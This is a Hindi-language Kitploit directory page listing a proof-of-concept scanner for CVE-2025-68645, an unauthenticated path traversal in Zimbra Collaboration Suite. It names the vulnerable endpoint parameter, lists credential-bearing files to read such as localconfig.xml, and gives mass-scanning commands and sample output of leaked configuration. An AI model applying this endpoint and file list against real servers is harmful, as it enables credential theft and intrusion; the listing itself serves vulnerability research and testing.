Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite में अप्रमाणित फ़ाइल पढ़ने की कमजोरी | Kitploit
उपकरण/GitHubGitHub/harisaidhin/poc_cve-2025-68645
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite में अप्रमाणित फ़ाइल पढ़ने की कमजोरी

रिपॉजिटरी देखें
134 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68645 - Zimbra पथ ट्रैवर्सल भेद्यता

Security CVE Python License Status

📋 अवलोकन

CVE-2025-68645 एक पथ ट्रैवर्सल भेद्यता है Zimbra Collaboration Suite में जो अनधिकृत हमलावरों को सर्वर के फाइलसिस्टम से मनमानी फ़ाइलें पढ़ने की अनुमति देती है।

संवेदनशील एंडपॉइंट

/h/printconversations?javax.servlet.include.servlet_path=

🎯 प्रभाव

प्रभावगंभीरता
अनधिकृत फ़ाइल पढ़ना🔴 उच्च
कॉन्फ़िगरेशन प्रकटीकरण🔴 उच्च
क्रेडेंशियल लीकेज🔴 उच्च
आंतरिक नेटवर्क मैपिंग🟠 मध्यम

📁 पढ़ने योग्य फ़ाइलें

पथउजागर जानकारी
/WEB-INF/web.xmlसर्वलेट मैपिंग, सुरक्षा बाधाएँ
/WEB-INF/zcs.web.xmlZimbra-विशिष्ट कॉन्फ़िगरेशन
/opt/zimbra/conf/localconfig.xmlLDAP क्रेडेंशियल, डेटाबेस पासवर्ड
/opt/zimbra/conf/ldap-config.xmlLDAP सर्वर कॉन्फ़िगरेशन
/opt/zimbra/conf/attrs/zimbra-attrs.xmlसिस्टम विशेषताएँ
/WEB-INF/classes/logging.propertiesलॉगिंग कॉन्फ़िगरेशन

🚀 उपयोग

एकल लक्ष्य स्कैन

python CVE-2025-68645.py.py -t https://target.zimbra.com

बड़े पैमाने पर स्कैनिंग

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

उन्नत विकल्प

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 कमांड लाइन आर्गुमेंट्स

आर्गुमेंट विवरण डिफ़ॉल्ट -t, --target एकल लक्ष्य URL कोई नहीं -l, --list लक्ष्यों की सूची वाली फ़ाइल कोई नहीं -o, --output आउटपुट फ़ाइल नाम results.json --threads समवर्ती थ्रेड्स की संख्या 10 --timeout सेकंड में अनुरोध टाइमआउट 15 -v, --verbose विस्तृत आउटपुट सक्षम करें False --no-verify SSL सत्यापन अक्षम करें False --read-all सभी संवेदनशील पथ पढ़ें False

📸 उदाहरण आउटपुट

[*] स्कैन किया जा रहा है: https://target.zimbra.local [✓] असुरक्षित: https://target.zimbra.local [+] निकाला गया कॉन्फ़िगरेशन: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] मिला: /WEB-INF/web.xml [+] मिला: /opt/zimbra/conf/localconfig.xml [!] संभावित क्रेडेंशियल लीक हुए /WEB-INF/web.xml में

============================================================ स्कैन पूर्ण! बीता समय: 1.02 सेकंड कुल लक्ष्य: 1 असुरक्षित: 1 असुरक्षित नहीं: 0

टूल डाउनलोड करें